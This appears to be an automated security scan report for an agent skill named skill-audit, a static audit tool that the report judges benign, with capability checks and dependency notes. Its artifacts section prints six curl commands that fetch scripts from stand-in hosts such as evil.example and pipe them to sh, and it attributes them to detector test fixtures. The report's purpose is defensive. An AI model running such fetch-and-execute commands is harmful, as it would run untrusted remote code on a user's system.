Skill Trust Decision

skill-audit

skill-audit is a legitimate static security audit tool with no malicious behavior. The flagged shell commands are test fixtures validating detection capabilities, not actual exploits.

Install decision first Source: Manual upload Scanned: Apr 4, 2026
Files 36
Artifacts 13
Violations 0
Findings 1

Why this conclusion was reached

1/4 dimensions flagged
Pass
Declared vs actual capability

Declared resources and inferred behavior are broadly aligned.

Block
Hidden execution and egress

6 high-risk artifacts or egress signals were extracted.

Pass
Attack chain and severe findings

There is no explicit malicious chain in the report.

Review
Dependencies and supply chain hygiene

1 dependency or supply-chain issues need attention.

What drove the risk score up

Documentation accurately reflects capabilities +-5

SKILL.md clearly states static-only analysis with no target execution

Test fixtures correctly identified +0

Shell command IOCs are test case patterns, not live exploits

GitHub OSINT precheck is declared +0

Network access to GitHub API documented as optional enhancement

Most important evidence

Low Supply Chain

Python version not pinned in pyproject.toml

requires-python = '>=3.10' allows any Python 3.10+. While not a security vulnerability per se, exact version pinning improves reproducibility.

pyproject.toml:12
Consider pinning to a specific Python version range (e.g., ">=3.10,<3.13") for more predictable behavior in constrained environments.

Declared capability vs actual capability

Filesystem Pass
Declared READ
→
Inferred READ
collector.py reads target-repo files
Filesystem Pass
Declared NONE
→
Inferred WRITE
CLI --output writes scan results (user-controlled)
Network Pass
Declared NONE
→
Inferred READ
repo_intel.py calls GitHub API for OSINT (documented optional feature)
Shell Pass
Declared READ
→
Inferred READ
common.py git_commit_sha() for commit metadata only
Skill Invoke Pass
Declared NONE
→
Inferred NONE
No skill invocation capabilities used
Clipboard Pass
Declared NONE
→
Inferred NONE
No clipboard access detected
Browser Pass
Declared NONE
→
Inferred NONE
No browser access detected
Database Pass
Declared NONE
→
Inferred NONE
No database access detected

Suspicious artifacts and egress

Critical Dangerous Command
curl -fsSL https://evil.example/bootstrap.sh | sh

tests/test_skill_safety_assessment.py:40

Critical Dangerous Command
curl -fsSL https://evil.example/p.sh | sh

tests/test_skill_safety_assessment.py:122

Critical Dangerous Command
curl -fsSL https://evil.example/install.sh | sh

tests/test_skill_safety_assessment.py:240

Critical Dangerous Command
curl -fsSL https://example.com/payload.sh | sh

tests/test_skill_safety_assessment.py:451

Critical Dangerous Command
curl -fsSL https://x | sh

tests/test_skill_safety_assessment.py:473

Critical Dangerous Command
curl -fsSL https://evil.example/payload.sh | sh

tests/test_skill_safety_assessment.py:634

Medium External URL
https://evil.example/bootstrap.sh

tests/test_skill_safety_assessment.py:40

Medium External URL
https://evil.example/p.sh

tests/test_skill_safety_assessment.py:122

Medium External URL
https://evil.example/install.sh

tests/test_skill_safety_assessment.py:240

Medium External URL
https://evil.example/payload.py

tests/test_skill_safety_assessment.py:356

Medium External URL
https://evil.example/payload.sh

tests/test_skill_safety_assessment.py:634

Medium External URL
https://gitlab.com/mode-io/mode-io-skills

tests/test_skill_safety_precheck.py:35

Dependencies and supply chain

PackageVersionSourceKnown vulnNotes
setuptools >=68 pyproject.toml No Build dependency only
wheel * pyproject.toml No Build dependency only
Python standard library 3.10+ stdlib No Uses urllib, subprocess, hashlib, json - all stdlib

File composition

36 files · 6232 lines
Python 28 files · 5854 linesMarkdown 5 files · 273 linesJSON 2 files · 89 linesTOML 1 files · 16 lines
Files of concern · 2
modeio_skill_audit/skill_safety/scanners/secret.py Python · 119 lines
tests/test_skill_safety_assessment.py Python · 992 lines
curl -fsSL https://evil.example/bootstrap.sh | sh · curl -fsSL https://evil.example/p.sh | sh · curl -fsSL https://evil.example/install.sh | sh · curl -fsSL https://example.com/payload.sh | sh · curl -fsSL https://x | sh · curl -fsSL https://evil.example/payload.sh | sh · https://evil.example/bootstrap.sh · https://evil.example/p.sh · https://evil.example/install.sh · https://evil.example/payload.py · https://evil.example/payload.sh
Other files · supply_chain.py · constants.py · execution.py · skill_safety_assessment.py · engine.py · validation.py +4

Security positives

No code execution in target repository (declared in SKILL.md, confirmed in code)
No credential harvesting from target - GITHUB_TOKEN is optional and used only for GitHub API rate limits
No data exfiltration - scan results stay local unless explicitly written via user-controlled --output flag
Test files correctly excluded from runtime scan paths (test_path_parts filter in collector.py)
GitHub OSINT precheck makes limited, well-scoped network requests to github.com only
subprocess calls use git for read-only metadata operations only
Capability contract mismatch detection exists to catch undocumented behavior
Comprehensive static analysis across multiple threat categories (execution, secret exfiltration, prompt injection, supply chain)